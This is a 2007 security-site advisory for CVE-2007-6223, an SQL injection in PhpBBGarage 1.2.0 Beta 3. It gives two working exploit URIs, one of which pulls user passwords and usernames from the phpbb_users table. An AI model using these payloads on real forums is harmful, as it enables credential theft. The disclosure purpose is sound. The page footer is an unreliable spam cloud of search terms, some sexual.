about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PhpBBGarage Garage.PHP SQL Injection Vulnerability


Title PhpBBGarage Garage.PHP SQL Injection Vulnerability
Published 2007-12-03-12:00AM
Updated 2008-03-13-02:51PM
Class Input Validation Error
CVE   CVE-2007-6223
Remote  Yes
Local  No
Credit  maku234 is credited with the discovery of this vulnerability.
Vulnerable  PhpBBGarage PhpBBGarage 1.2.0 Beta 3
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following URIs are available: http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 01:59:39 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.21af.c php-nuke+a mambo Remo indiatamil Nagma nude www.xxx4a. six image mambo Remo www.tjzylc shakela se www.xxx4a. Wap4sex.co Apache 1.3 black vide teen hot t sexinschoo dropper Pornograf 200 /compo www.btjywl abby winte sex move v www.89.cgm acdc all cartoo Mujer foll www.89.cgm zjhx.5d6d. cebu PHP guestb o my goody boerkang.c 52cpp.com mambo Remo www.kx0556 swim 52cpp.com 200 /compo news for c indian sex FREE PREET www.zgjfbj chatfarsi www.jiqing news for c php-nuke+2 news for C mambo Remo retoporna www.zgjfbj